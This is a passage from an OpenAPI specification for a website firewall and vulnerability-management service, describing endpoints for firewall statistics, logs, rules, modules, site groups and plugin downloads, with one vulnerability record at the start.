                  vuln_type: 'Cross Site Scripting (XSS)'
                  affected_in: '<= 2.5.5'
                  fixed_in: ''
                  is_exploited: 0
                  patch_priority: 2
                  credit_name: 'nathanial Lattimer (d0nut)'
                  vpatch: 9063
                  disclosure_date: '2024-04-03 09:37:02'
                  resolve_date: '10 Apr, 2024'
                  score: 9.9
                  unseen: false
                  vuln_url: 'https://patchstack.com/database/vulnerability/svg-support/wordpress-svg-support-plugin-2-5-5-authenticated-author-cross-site-scripting-via-svg-vulnerability'
  '/dashboard/firewall/{days}':
    get:
      tags:
        - Dashboard
      summary: 'Get firewall statistics'
      description: 'Pull firewall data for a specific amount of days.'
      operationId: 7e7b40f7b236373909e5d8fdb8e6d9ae
      parameters:
        -
          name: days
          in: path
          description: 'Number of days to go back for data fetching.'
          required: true
          example: 180
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { attacks: { description: 'Attacks blocked per day based on the date parameter.', type: array, items: { properties: { num: { description: 'Number of attacks blocked.', type: integer, example: 0 }, dateday: { description: 'Date of the attacks blocked.', type: string, example: '2024-10-19' } }, type: object } } }
                  type: object
              example:
                attacks:
                  - { num: 0, dateday: '2024-10-14' }
                  - { num: 0, dateday: '2024-10-15' }
                  - { num: 0, dateday: '2024-10-16' }
                  - { num: 0, dateday: '2024-10-17' }
                  - { num: 0, dateday: '2024-10-18' }
                  - { num: 0, dateday: '2024-10-19' }
                  - { num: 0, dateday: '2024-10-20' }
                  - { num: 0, dateday: '2024-10-21' }
                  - { num: 0, dateday: '2024-10-22' }
  '/download/wordpress/{site}':
    get:
      tags:
        - 'Plugin Download'
      summary: 'Download WordPress plugin'
      description: 'Download the WordPress plugin, with the API keys injected into the plugin.'
      operationId: 54ec70b2b389dc50b18e4bcfeaf17aab
      parameters:
        -
          name: site
          in: path
          description: 'The unique identifier of the site'
          example: 1
      responses:
        '200':
          description: 'File served as download.'
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'Something went wrong.'
  /firewall/statistics:
    post:
      tags:
        - Firewall
      summary: 'Get firewall statistics'
      description: 'Get statistics data for the firewall page.'
      operationId: edd0582b9e216543afc1ebe7c70f3526
      requestBody:
        required: true
        content:
          application/json:
            schema:
              required:
                - date
                - site_id
              properties:
                date:
                  description: 'Number of days to go back for pulling up the statistics.'
                  type: integer
                  default: 30
                site_id:
                  description: 'If not 0, pulls the statistics for this particular site identifier.'
                  type: integer
                  default: 0
              type: object
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { attacks: { description: 'Attacks blocked per day based on the date parameter.', properties: { num: { description: 'Number of attacks blocked.', type: integer, example: 0 }, dateday: { description: 'Date of the attacks blocked.', type: string, example: '2024-10-19' } }, type: object }, ips: { description: 'Top IP addresses that have been blocked.', type: array, items: { properties: { ip: { description: 'The IP address.', type: integer, example: 0 }, num: { description: 'Number of attacks blocked for this IP address.', type: integer, example: 20 }, cc: { description: 'Country code information of the IP address.', properties: { country: { description: 'The full name of the country.', type: string, example: 'United States' }, iso_code: { description: 'The ISO format of the country.', type: string, example: US } }, type: object } }, type: object } }, rules: { description: 'Top rules that have been triggered.', type: array, items: { properties: { description: { description: 'The description of the rule.', type: string, example: 'Access PHP files directly.' }, num: { description: 'Number of attacks blocked for this rule.', type: integer, example: 20 } }, type: object } } }
                  type: object
              example:
                attacks:
                  - { num: 5, dateday: '2024-10-26' }
                  - { num: 15, dateday: '2024-10-27' }
                ips:
                  - { ip: 123.172.130.74, cc: { country: 'United States', iso_code: US }, num: 20 }
                rules:
                  - { num: 20, description: 'Access PHP files directly.' }
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'Invalid number of days supplied'
  /firewall/logs:
    post:
      tags:
        - Firewall
      summary: 'Get firewall logs'
      description: 'Get firewall logs of all sites of the user.'
      operationId: 0bd64bca1163fa96744238be020268cd
      requestBody:
        required: true
        content:
          application/json:
            schema:
              required:
                - page
                - per_page
              properties:
                page:
                  description: 'Current paginated page.'
                  type: integer
                  example: 1
                per_page:
                  description: 'Number of entries per page.'
                  type: integer
                  example: 25
                search:
                  description: 'If search_type is application, search site with this URL.'
                  type: string
                  example: ''
                search_type:
                  description: 'Search type to execute, for Application, this must be the site URL.'
                  type: string
                  enum: ['', Application]
                  example: Application
                site_id:
                  description: 'Search the logs for the given site identifier.'
                  type: integer
                  default: 0
              type: object
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { logs: { description: Logs, type: array, items: { properties: { fid: { description: 'Category of firewall rule, unused.', type: string, example: DT, deprecated: true }, method: { description: 'HTTP request method.', type: string, example: POST }, log_date: { description: 'Date of log entry.', type: string, example: '2024-01-09T13:39:27.000Z' }, ip: { description: 'IP address.', type: string, example: 123.123.123.123 }, request_uri: { description: 'Request URL that has been blocked.', type: string, example: /my-test-url }, action: { description: 'The action that occurred.', type: string, example: Block }, _id: { description: 'Unique identifier belonging to the blocked request.', type: string, example: RIZz7owB0f0X1K7vFWF }, rule_id: { description: 'Rule identifier of the blocked request.', type: integer, example: 9095 }, description: { description: 'Description of the firewall rule.', type: string, example: Unknown }, cc: { description: 'Country code information of the IP address.', properties: { country: { description: 'The full name of the country.', type: string, example: 'United States' }, iso_code: { description: 'The ISO format of the country.', type: string, example: US } }, type: object }, datetime: { description: 'Formatted time of log_date.', type: string, example: 'January 9th, 2024 · 13:39:27' }, siteid: { description: 'Unique site identifier of the site which blocked this request.', type: integer, example: 1 }, url: { description: 'The URL of the site.', type: string, example: 'https://test.com' }, cms: { description: 'CMS of the site.', type: string, example: WordPress }, module: { description: 'Module name, unused.', type: string, example: '', deprecated: true } }, type: object } }, total: { description: 'Total number of blocked requests with current filter.', type: integer, example: 1 } }
                  type: object
              example:
                logs:
                  - { fid: Unknown, method: POST, log_date: '2024-01-09T13:39:27.000Z', ip: 127.0.0.1, request_uri: /my-test-url, action: Block, _id: RIZz7owB0f0X1K7vFWF, rule_id: '9095', description: Unknown, cc: { country: Unknown, iso_code: Unknown }, datetime: 'January 9th, 2024 · 13:39:27', siteid: 1, url: 'https://test.com', cms: WordPress, module: '' }
                total: 1
  /firewall/sites:
    get:
      tags:
        - Firewall
      summary: 'Get sites firewall state'
      description: 'Get all sites of the user with the firewall running (at some point).'
      operationId: 30c46d91bdd79908191c43c8b82e17a0
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                description: 'Array of sites.'
                type: array
                items:
                  properties: { id: { description: 'The unique identifier of the site.', type: integer, example: 1 }, url: { description: 'URL of the site.', type: string, example: 'https://test.com' } }
                  type: object
              example:
                -
                  id: 1
                  url: 'https://test.com'
  /firewall/rule/test:
    post:
      tags:
        - Firewall
      summary: 'Test firewall rule'
      description: 'Test an existing or new firewall rule.'
      operationId: cba1f541b084d72cbe6669c88ab14879
      requestBody:
        required: true
        content:
          application/json:
            schema:
              properties:
                function:
                  description: 'The JSON of the rule to test.'
                  type: string
                  default: '[{\"parameter\":\"server.HTTP_USER_AGENT\",\"match\":{\"type\":\"contains\",\"value\":\"ABadBot\"}}]'
                request_json:
                  description: 'The JSON of the request to test against.'
                  type: string
                  default: '{\"SERVER\":{\"HTTP_USER_AGENT\":\"FireFox123 ABadBot Edge\"},\"GET\":{\"id\":123},\"POST\":{\"id\":123}}'
              type: object
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: 'The firewall rule is valid. The return value of the firewall rule was: true'
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'The firewall rule is invalid, please double check the JSON format and syntax.'
  /firewall/rule/create:
    post:
      tags:
        - Firewall
      summary: 'Create firewall rule'
      description: 'Create a new firewall rule.'
      operationId: 2b7682c3ef5abf889480eb24ddfb0c30
      requestBody:
        required: true
        content:
          application/json:
            schema:
              properties:
                title:
                  description: 'Title of the rule.'
                  type: string
                  default: test
                type:
                  description: 'Type of action to perform upon a match.'
                  type: string
                  default: BLOCK
                  enum: [BLOCK, REDIRECT, LOG, WHITELIST]
                typeParams:
                  description: 'If type property equals REDIRECT, specify redirect URL in this field.'
                  type: string
                  default: ''
                isWhitelist:
                  description: 'Whether or not this rule is a whitelist rule and not a firewall rule.'
                  type: integer
                  default: 0
                method:
                  description: 'HTTP request method to match against.'
                  type: string
                  default: ALL
                  enum: [ALL, GET, POST]
                rule_v2:
                  description: 'The JSON rule format.'
                  type: string
                  default: '[{\"parameter\":\"server.HTTP_USER_AGENT\",\"match\":{\"type\":\"contains\",\"value\":\"ABadBot\"}}]'
                rule_request:
                  description: 'The JSON request format to test.'
                  type: string
                  default: '{\"SERVER\":{\"HTTP_USER_AGENT\":\"FireFox123 ABadBot Edge\"},\"GET\":{\"id\":123},\"POST\":{\"id\":123}}'
              type: object
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { success: { description: Success, type: boolean, example: true }, id: { description: 'Unique identifier of the firewall rule.', type: integer, example: 1 } }
                  type: object
              example:
                success: true
                id: 1
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'The given regular expression is invalid, please double check.'
  /firewall/group/create:
    post:
      tags:
        - Firewall
      summary: 'Creates website group'
      description: 'Creates new website group.'
      operationId: abdf9d054d0555751c7c3730fd51a368
      requestBody:
        required: true
        content:
          application/json:
            schema:
              required:
                - title
                - sites
              properties:
                title:
                  description: 'Title of the website group.'
                  type: string
                  default: 'Rule test'
                sites:
                  description: 'Array of site identifiers attached to the group.'
                  type: integer
                  default: []
                  example: [1]
              type: object
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: true
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: true
  /firewall/rules:
    post:
      tags:
        - Firewall
      summary: 'Get firewall rules'
      description: 'Get the firewall rules created by the user with modules information.'
      operationId: 49a2e81371b011c692938c836eaffda8
      requestBody:
        required: true
        content:
          application/json:
            schema:
              required:
                - page
                - search
              properties:
                page:
                  description: 'Page number.'
                  type: integer
                  default: 1
                search:
                  description: 'Search in title of created rule.'
                  type: string
                  default: ''
              type: object
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { total: { description: 'Total number of rules.', type: integer, example: 1 }, rules: { description: Rules, type: array, items: { properties: { id: { description: 'Unique identifier of the firewall rule.', type: integer, example: 71 }, title: { description: 'Title of the firewall rule.', type: string, example: 'My very own firewall rule.' }, site: { description: 'Array of site URLs to which the rule is directly attached.', type: list, example: ['https://test.com'] } }, type: object } } }
                  type: object
              example:
                total: 1
                rules:
                  - { id: 71, title: 'My very own firewall rule.', site: ['https://test.com'] }
  /firewall/rule/templates:
    get:
      tags:
        - Firewall
      summary: 'Get firewall rule templates'
      description: 'Get all firewall rule templates.'
      operationId: 95a57393cba243a191267de9d768148b
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { id: { description: 'Template name.', type: integer, example: 1 }, title: { description: 'Template title.', type: string, example: 'Whitelist IP addresses' }, fields: { description: Fields, type: array, items: { properties: { eval: { description: 'Eval string to execute.', type: string, example: 'JSON.stringify(value.split(\";\"))' }, title: { description: 'Title of field.', type: string, example: 'Enter IP addresses seperated by ;' }, placeholder: { description: 'Placeholder of field.', type: string, example: 'E.g. 192.168.1.1;33.44.55.66' } }, type: object } }, closure: { description: 'Closure to execute.', type: string, example: '' }, rule: { description: 'Rule of the template.', type: string, example: '[\n   {\n      \"parameter\":\"server.ip\",\n      \"match\":{\n         \"type\":\"in_array\",\n         \"value\":<field1>\n      }\n   }\n]' }, type: { description: 'The type of rule to create.', type: string, example: WHITELIST } }
                  type: object
              example:
                -
                  id: 1
                  title: 'Whitelist IP addresses'
                  fields: { eval: 'JSON.stringify(value.split(\";\"))', title: 'Enter IP addresses seperated by ;', placeholder: 'E.g. 192.168.1.1;33.44.55.66' }
                  closure: ''
                  rule: '[\n   {\n      \"parameter\":\"server.ip\",\n      \"match\":{\n         \"type\":\"in_array\",\n         \"value\":<field1>\n      }\n   }\n]'
                  type: WHITELIST
  '/firewall/rule/{id}':
    get:
      tags:
        - Firewall
      summary: 'Get firewall rule'
      description: 'Get the information of an individual rule.'
      operationId: 4038aea0b34de0134465c5a474e6d9f8
      parameters:
        -
          name: id
          in: null
          description: 'Unique identifier of the rule.'
          required: true
          example: 71
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { id: { description: 'Unique identifier of the firewall rule.', type: integer, example: 71 }, title: { description: 'Title of the firewall rule.', type: string, example: 'My very own firewall rule.' }, type: { description: 'Type of action to perform upon a match.', type: string, enum: [BLOCK, REDIRECT, LOG, WHITELIST], example: BLOCK }, type_params: { description: 'If type property equals REDIRECT, specify redirect URL in this field.', type: string, example: '' }, is_whitelist: { description: 'Whether or not this rule is a whitelist rule and not a firewall rule.', type: integer, example: 0 }, method: { description: 'HTTP request method to match against.', type: string, enum: [ALL, GET, POST], example: ALL }, rule_v2: { description: 'The JSON rule format.', type: string, example: '[{\"parameter\":\"server.HTTP_USER_AGENT\",\"match\":{\"type\":\"contains\",\"value\":\"ABadBot\"}}]' }, user_id: { description: 'ID of the user that owns this rule.', type: integer, example: null }, auto_assign: { description: 'Whether or not to auto assign this rule to sites.', type: integer, example: 0 } }
                  type: object
              example:
                id: 71
                title: 'My very own firewall rule.'
                rule_v2: '[{\"parameter\":\"server.HTTP_USER_AGENT\",\"match\":{\"type\":\"contains\",\"value\":\"ABadBot\"}}]'
                type: BLOCK
                type_params: null
                is_whitelist: 0
                user_id: 1
                auto_assign: 1
  '/firewall/{rule}/sites':
    get:
      tags:
        - Firewall
      summary: 'Get rule sites'
      description: 'Given rule, determine which sites are and are not attached to it.'
      operationId: 98a4630994f7fc82d447b80180f0268a
      parameters:
        -
          name: rule
          in: path
          description: Rule.
          required: true
          example: 1
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { id: { description: 'Unique identifier of the site.', type: integer, example: 1 }, url: { description: 'URL of the site.', type: string, example: 'https://test.com' }, enabled: { description: 'Enabled on the site or not.', type: integer, example: false } }
                  type: object
              example:
                -
                  id: 1
                  url: 'https://test.com'
                  enabled: false
  /firewall/modules:
    get:
      tags:
        - Firewall
      summary: 'Get modules'
      description: 'Get the modules that are available globally and belong to the user.'
      operationId: 252104264e3dc4c3cf428c964d1223e4
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { id: { description: 'Identifier of module.', type: integer, example: 1 }, title: { description: 'Title of module.', type: string, example: 'Basic (OWASP Top 10' }, user_id: { description: 'ID of the user who owns the module.', type: integer, example: null }, description: { description: 'Description of module.', type: string, example: 'Protects your site against OWASP Top 10 attacks' }, ip_count: { description: 'IP count, exclusive to IP module.', type: integer, example: null }, ruleCount: { description: 'Number of rule attached.', type: integer, example: 71 }, siteCount: { description: 'Number of sites attached.', type: integer, example: 0 }, auto_assign: { description: 'Whether or not to auto assign this module to sites.', type: integer, example: 0 }, cms_name: { description: 'Name of the CMS to which this module belongs to.', type: string, enum: [WordPress, Drupal, Joomla], example: WordPress } }
                  type: object
              example:
                -
                  id: 1
                  title: 'Basic (OWASP Top 10'
                  user_id: null
                  description: 'Protects your site against OWASP Top 10 attacks'
                  ip_count: null
                  ruleCount: 71
                  siteCount: 0
                  auto_assign: 0
                  cms_name: WordPress
  '/firewall/module/{id}':
    get:
      tags:
        - Firewall
      summary: 'Get module rules'
      description: 'Get the information of a module and its attached rules.'
      operationId: 2666f22ef3b0e26e2b53c7a4ee716d37
      parameters:
        -
          name: id
          in: path
          description: 'Module id.'
          example: 2
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { id: { description: 'Identifier of module.', type: integer, example: 2 }, title: { description: 'Title of module.', type: string, example: 'WordPress Virtual Patches' }, created_at: { description: 'Creation time.', type: string, example: '2023-12-15T07:32:17.000000Z' }, deleted_at: { description: 'Deletion time.', type: string, example: null }, updated_at: { description: 'Updated time.', type: string, example: '2023-12-15T07:32:17.000000Z' }, user_id: { description: 'ID of user who owns this module.', type: integer, example: null }, description: { description: 'Description of module.', type: string, example: 'Protects from attacks on vulnerable WordPress core and plugins' }, ip_count: { description: 'IP count, exclusive to IP module.', type: integer, example: 0 }, all_rules: { description: 'All rules attached to the module.', type: list, example: [] } }
                  type: object
              example:
                -
                  id: 2
                  title: 'WordPress Virtual Patches'
                  created_at: '2023-12-15T07:32:17.000000Z'
                  updated_at: '2023-12-15T07:32:17.000000Z'
                  deleted_at: null
                  user_id: null
                  description: 'Protects from attacks on vulnerable WordPress core and plugins'
                  ip_count: 0
                  all_rules: []
  '/firewall/module/{id}/sites':
    get:
      tags:
        - Firewall
      summary: 'Get module sites'
      description: 'Given module, determine which sites are and are not attached to it.'
      operationId: d5278491c1fdbf60fddb873b7c68c050
      parameters:
        -
          name: id
          in: path
          description: 'Module id.'
          example: 2
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { id: { description: 'Unique identifier of the site.', type: integer, example: 1 }, url: { description: 'URL of the site.', type: string, example: 'https://test.com' }, enabled: { description: 'Enabled on the site or not.', type: integer, example: false } }
                  type: object
              example:
                -
                  id: 1
                  url: 'https://test.com'
                  enabled: false
  /firewall/group/available:
    get:
      tags:
        - Firewall
      summary: 'Get groups'
      description: 'Get the available website groups with modules and sites.'
      operationId: 5a70f0fddbaf3f2250e0572a36e82e1c
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { sites: { description: 'Array of sites.', type: array, items: { properties: { id: { description: 'Unique identifier of the site.', type: integer, example: 1 }, url: { description: 'URL of the site.', type: string, example: 'https://test.com' } }, type: object } }, modules: { description: 'Array of available modules.', type: array, items: { properties: { id: { description: 'Identifier of module.', type: integer, example: 2 }, title: { description: 'Title of module.', type: string, example: 'WordPress Virtual Patches' } }, type: object } } }
                  type: object
              example:
                sites:
                  id: 1
                  url: 'https://test.com'
                modules:
                  - { id: 2, title: 'WordPress Virtual Patches' }
  '/firewall/module/{id}/update':
    post:
      tags:
        - Firewall
      summary: 'Update module.'
      description: 'Update a module.'
      operationId: 3e531d79c22c7e15b221726f07ef19fd
      parameters:
        -
          name: id
          in: path
          description: 'Module id.'
          required: true
          example: '1'
      requestBody:
        required: true
        content:
          application/json:
            schema:
              required:
                - title
                - rules
              properties:
                title:
                  description: 'New title.'
                  type: string
                  default: 'Test module'
                rules:
                  description: 'Array of rules to attach to the module.'
                  type: array
                  items: { type: int }
                  example: [383, 381, 178, 1]
              type: object
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: true
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'Invalid rule specified.'
  '/firewall/group/{id}/update':
    post:
      tags:
        - Firewall
      summary: 'Updated website group.'
      description: 'Updated a website group.'
      operationId: 367efb3557d9a1cb4ebae2c324a8fa91
      parameters:
        -
          name: id
          in: path
          description: 'Group id.'
          required: true
          example: '1'
      requestBody:
        required: true
        content:
          application/json:
            schema:
              required:
                - title
                - sites
                - modules
              properties:
                title:
                  description: 'Title of the firewall group.'
                  type: string
                  default: 'Test module'
                sites:
                  description: 'Array of site identifiers to attach to the firewall group.'
                  type: array
                  items: { type: int }
                  example: [1]
                modules:
                  description: 'Array of module identifiers to attach to the firewall group.'
                  type: array
                  items: { type: int }
                  example: [383, 381, 178, 1]
              type: object
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: true
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: error
  '/firewall/rule/{id}/delete':
    delete:
      tags:
        - Firewall
      summary: 'Delete firewall rule'
      description: 'Delete a rule.'
      operationId: c2b78dc0dfb133d904fb01eb4c0ed0f0
      parameters:
        -
          name: id
          in: path
          description: 'Rule identifier.'
          required: true
          example: '1'
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: true
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: error.
  '/firewall/module/{id}/delete':
    delete:
      tags:
        - Firewall
      summary: 'Delete module'
      description: 'Delete a module.'
      operationId: fb557c0c78b2a15c1dc714b920923d10
      parameters:
        -
          name: id
          in: path
          description: 'Module identifier.'
          required: true
          example: '1'
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: true
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: error.
  '/firewall/group/{id}/delete':
    delete:
      tags:
        - Firewall
      summary: 'Delete website group'
      description: 'Delete a website group.'
      operationId: e81f98f1f246bd6c5c3e2671d568158e
      parameters:
        -
          name: id
          in: path
          description: 'Group identifier.'
          required: true
          example: '1'
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: true
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: error
  '/firewall/group/{id}/site/{site}/delete':
    delete:
      tags:
        - Firewall
      summary: 'Delete site from site group'
      description: 'Delete a specific website from a specific site group.'
      operationId: 7e5fe542fba0695ec2eeccd54af104b7
      parameters:
        -
          name: id
          in: path
          description: 'Group id.'
          required: true
          example: '1'
        -
          name: site
          in: path
          description: 'The unique identifier of the site'
          required: true
          example: '1'
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: 'The site group relation has been deleted.'
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'You are not the owner of this site group.'
  '/firewall/group/{id}/site/{site}/update':
    post:
      tags:
        - Firewall
      summary: 'Update site groups'
      description: 'Update the groups of a specific site.'
      operationId: 26598a0cb64e1a78bdf7d7650abb4b51
      parameters:
        -
          name: id
          in: path
          description: 'Group id.'
          required: true
          example: '1'
        -
          name: site
          in: path
          description: 'The unique identifier of the site'
          required: true
          example: '1'
      requestBody:
        required: true
        content:
          application/json:
            schema:
              required:
                - groups
              properties:
                groups:
                  description: 'Array of group identifiers to attach to the site.'
                  type: array
                  items: { type: int }
                  example: [383, 381, 178, 1]
              type: object
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: 'The site group relation has been updated.'
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'You are not the owner of the given site groups.'
  '/firewall/group/site/{site}/update/single':
    post:
      tags:
        - Firewall
      summary: 'Add site group to site'
      description: 'Add a single group to a specific site.'
      operationId: da094bd2f956cca83615ee3e1c53c6db
      parameters:
        -
          name: site
          in: path
          description: 'The unique identifier of the site'
          required: true
          example: '1'
      requestBody:
        required: true
        content:
          application/json:
            schema:
              required:
                - group_id
              properties:
                group_id:
                  description: 'The group identifier for the group to add the site to.'
                  type: integer
                  example: 1
              type: object
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: 'The site group relation has been added.'
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'You are not the owner of this site group.'
  '/firewall/module/{module}/site/{site}/enable':
    post:
      tags:
        - Firewall
      summary: 'Enable module on site'
      description: 'Enable a module on a site.'
      operationId: 2500ab6c01c1181c03e6c72fb853ebd2
      parameters:
        -
          name: module
          in: path
          description: 'Module id.'
          required: true
          example: '1'
        -
          name: site
          in: path
          description: 'The unique identifier of the site'
          required: true
          example: '1'
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: true
  '/firewall/module/{module}/site/{site}/disable':
    post:
      tags:
        - Firewall
      summary: 'Disable module on site'
      description: 'Disable a module on a site.'
      operationId: 0b03aa2cab3ad20e9e3d184d263eb5c0
      parameters:
        -
          name: module
          in: path
          description: 'Module id.'
          required: true
          example: '1'
        -
          name: site
          in: path
          description: 'The unique identifier of the site'
          required: true
          example: '1'
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: true
  '/firewall/{rule}/site/{site}/enable':
    post:
      tags:
        - Firewall
      summary: 'Enable rule on site'
      description: 'Enable a rule on a site.'
      operationId: 5ec3a79a922065b0729d0f6252e1b8d8
      parameters:
        -
          name: site
          in: path
          description: 'The unique identifier of the site'
          required: true
          example: '1'
        -
          name: rule
          in: path
          description: 'Rule id.'
          required: true
          example: '1'
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: true
  '/firewall/{rule}/site/{site}/disable':
    post:
      tags:
        - Firewall
      summary: 'Disable rule on site'
      description: 'Disable a rule on a site.'
      operationId: 57004d641fd0a20e7b124494d6f57e73
      parameters:
        -
          name: site
          in: path
          description: 'The unique identifier of the site'
          required: true
          example: '1'
        -
          name: rule
          in: path
          description: 'Rule id.'
          required: true
          example: '1'
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: true
  '/firewall/{rule}/global/{state}':
    post:
      tags:
        - Firewall
      summary: 'Toggle rule on all sites'
      description: 'Toggle a rule on all sites.'
      operationId: fe7ae81fdeef7bb0141be890481cf78c
      parameters:
        -
          name: rule
          in: path
          description: 'Rule id.'
          required: true
          example: '1'
        -
          name: state
          in: path
          description: 'State id.'
          required: true
          example: '1'
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: 'The rule has been attached to all sites.'
  '/firewall/{rule}/group/{group}/{state}':
    post:
      tags:
        - Firewall
      summary: 'Toggle rule on all sites of group'
      description: 'Toggle a rule on all sites of a group.'
      operationId: 4f885d7f5ca0ac99be76791d4dcef44b
      parameters:
        -
          name: rule
          in: path
          description: 'Rule id.'
          required: true
          example: '1'
        -
          name: group
          in: path
          description: 'Group id.'
          required: true
          example: '1'
        -
          name: state
          in: path
          description: 'State; enable or disable.'
          required: true
          example: enable
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: 'The rule has been attached to all sites.'
  '/firewall/module/{module}/global/{state}':
    post:
      tags:
        - Firewall
      summary: 'Enable module on all sites'
      description: 'Enable a module on all sites.'
      operationId: 764864a28d72a3b89192146ec74511ff
      parameters:
        -
          name: module
          in: path
          description: 'Module id.'
          required: true
          example: '1'
        -
          name: state
          in: path
          description: 'State: enable or disable.'
          required: true
          example: enable
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: 'The module has been attached to all sites.'
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'You do not own this rule.'
  '/firewall/module/{module}/group/{group}/{state}':
    post:
      tags:
        - Firewall
      summary: 'Enable module on all sites of group'
      description: 'Enable a module on all sites of a group.'
      operationId: e54e813e6415902e010728dfe63febc4
      parameters:
        -
          name: module
          in: path
          description: 'Module id.'
          required: true
          example: '1'
        -
          name: group
          in: path
          description: 'Group id.'
          required: true
          example: '1'
        -
          name: state
          in: path
          description: 'State: enable or disable.'
          required: true
          example: enable
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: 'The module has been attached to all sites.'
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'You do not own this rule.'
  '/firewall/{rule}/auto/{state}':
    post:
      tags:
        - Firewall
      summary: 'Set rule auto-assign state'
      description: 'Set whether or not the rule should be auto-assigned to all future applications.'
      operationId: 54d89222f8f5507eb8e799add48c4036
      parameters:
        -
          name: site
          in: path
          description: 'The unique identifier of the site'
          required: true
          example: '1'
        -
          name: state
          in: path
          description: 'State: enable or disable.'
          required: true
          example: enable
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: 'The auto-assign state has been saved.'
  '/firewall/module/{module}/auto/{state}':
    post:
      tags:
        - Firewall
      summary: 'Set module auto-assign state'
      description: 'Set whether or not the module should be auto-assigned to all future applications.'
      operationId: 85cf52643487890de81acd04649cc1ff
      parameters:
        -
          name: module
          in: path
          description: 'Module id.'
          required: true
          example: '1'
        -
          name: state
          in: path
          description: 'State: enable or disable.'
          required: true
          example: enable
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: 'The auto-assign state has been saved.'
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'You do not own this rule.'
  '/firewall/clear/{site}':
    post:
      tags:
        - Firewall
      summary: 'Site clear rules cache'
      description: 'Tell a specific site to fetch new rules.'
      operationId: 4370261fed06191b4ec735abf9c23b40
      parameters:
        -
          name: site
          in: path
          description: 'The unique identifier of the site'
          required: true
          example: '1'
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: true
  '/site/plugin/installed/{site}':
    get:
      tags:
        - Sites
      summary: 'Verify installation'
      description: 'Verify whether or not the plugin has been installed and we have received data.'
      operationId: d932033c445ab06e5fd2dcb6ea8eead3
      parameters:
        -
          name: site
          in: path
          description: 'The unique identifier of the site'
          required: true
          example: 'true'
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                properties:
                  activated: { description: 'Activated state', type: boolean, example: true }
                type: object
              example:
                activated: true
  '/site/plugin/plugins/{site}':
    post:
      tags:
        - Sites
      summary: 'Get software'
      description: 'Get all software of a site.'
      operationId: 723a895ee2a90c9277d43598db314a46
      parameters:
        -
          name: site
          in: path
          description: 'The unique identifier of the site'
          required: true
          example: '1'
      requestBody:
        required: false
        content:
          application/json: {  }
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                properties:
